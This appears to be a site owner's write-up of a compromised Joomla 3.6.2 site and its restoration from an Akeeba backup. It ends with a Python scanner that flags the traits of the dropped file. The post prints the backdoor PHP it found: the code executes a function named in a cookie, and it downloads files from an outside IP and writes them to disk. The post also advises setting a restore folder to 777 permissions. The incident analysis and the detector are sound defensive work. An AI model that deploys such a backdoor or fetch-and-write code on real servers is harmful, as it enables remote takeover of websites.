Had a recent Joomla 3.6.2 install go blank. Site was fine one day and the next it was unreachable.
I FTP’ed into the site and I see WordPress folders in there and other strange files. There was a zip file called “cms brute rmf 3.0.zip”. There were odd PHP files such as “ebb6bff35a.php”. Looks like an attack for sure. The PHP file was extremely complex.
The file “ebb6bff35a.php” starts out by grabbing the id set in a cookie for “user id” then points back to the following IP with the cookie information. This IP stems from Belize.
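```php
// Calls the function named in the "user" cookie with the "id" cookie as its argument
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
if (isset($_REQUEST["test_url"])) {
    echo "file test okay";
}
// Fetches the path given in ?d= from the remote host and writes it to a local file of the same name
$f = $_GET["d"];
$id = $f;
$current = file_get_contents("http://80.87.205.79/$f");
file_put_contents($id, $current);
if (!defined('PCLZIP_READ_BLOCK_SIZE')) {
    define('PCLZIP_READ_BLOCK_SIZE', 2048);
}
```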

Hopefully I can figure out what happened, but I am worried about security for sure.
After contacting GoDaddy it looks like a complete attack. Uploaded PHP files, directories were created, and I didn’t get to check the database. Had to do a GoDaddy account reset and restore from an Akeeba backup.
The backup didn’t go well; I got the following error.

I followed the instructions on this page.
https://www.akeebabackup.com/documentation/troubleshooter/kscantextract.html
I had to create the “kicktemp” folder. Set the permissions to 777. Set the type of install to FTP. For the root directory I had to use “/”. Make sure to test the FTP connection.
The Kickstart restore took about 25 minutes to restore.
Here are the specs on the site.
- Joomla 3.6.2
- JCE
- Akeeba
- Chronoforms
- JO Facebook Events Pro
- Hot Themes Hot Fitness template.
One of the worst parts of this whole debacle is their SEO. The site was live for a month before the attack and the analytics were clicking along nicely. The site was getting around 300 plus hits in the first month with around 100 keyword matches.
During the attack the number of keyword matches jumped to 16,000 matches and incredibly junky results.

This is a running store and has nothing to do with “sexy turkey”. This all happened in just a few days. I really hope this doesn’t offend Google and they decide to block the site.
I hope this helps someone else out there…
Follow up:
A month after this attack I looked at all of the directories and found no trace of another attack.
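A directory sweep like the one in the follow-up can be scripted. The sketch below is an added example, not code from the original post; its three heuristics and their rule names are assumptions derived from the dropped file quoted above, and they will need tuning for a given site.

```python
import os
import re
import sys

# Assumed heuristics, derived from the sample quoted in the post; tune per site.
CALL_FROM_INPUT = re.compile(r"\$_(?:COOKIE|GET|POST|REQUEST)\s*\[[^\]]*\]\s*\(")
REMOTE_FETCH = re.compile(r"file_get_contents\s*\(\s*[\"']https?://", re.I)
DISK_WRITE = re.compile(r"file_put_contents\s*\(", re.I)
HEX_NAME = re.compile(r"^[0-9a-f]{8,}\.php$", re.I)


def scan_text(filename, text):
    """Return the names of the heuristics that match one PHP file."""
    hits = []
    if HEX_NAME.match(os.path.basename(filename)):
        hits.append("hex-filename")
    if CALL_FROM_INPUT.search(text):
        hits.append("request-value-called-as-function")
    if REMOTE_FETCH.search(text) and DISK_WRITE.search(text):
        hits.append("remote-fetch-written-to-disk")
    return hits


def scan_tree(root):
    """Walk a web root and map each flagged .php path to its hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            hits = scan_text(name, text)
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in sorted(scan_tree(root).items()):
        print(path + ": " + ", ".join(hits))
```

Run it against a local copy of the web root, for example one pulled down over FTP, and review every flagged file by hand; a hex-style name on its own is only a weak signal.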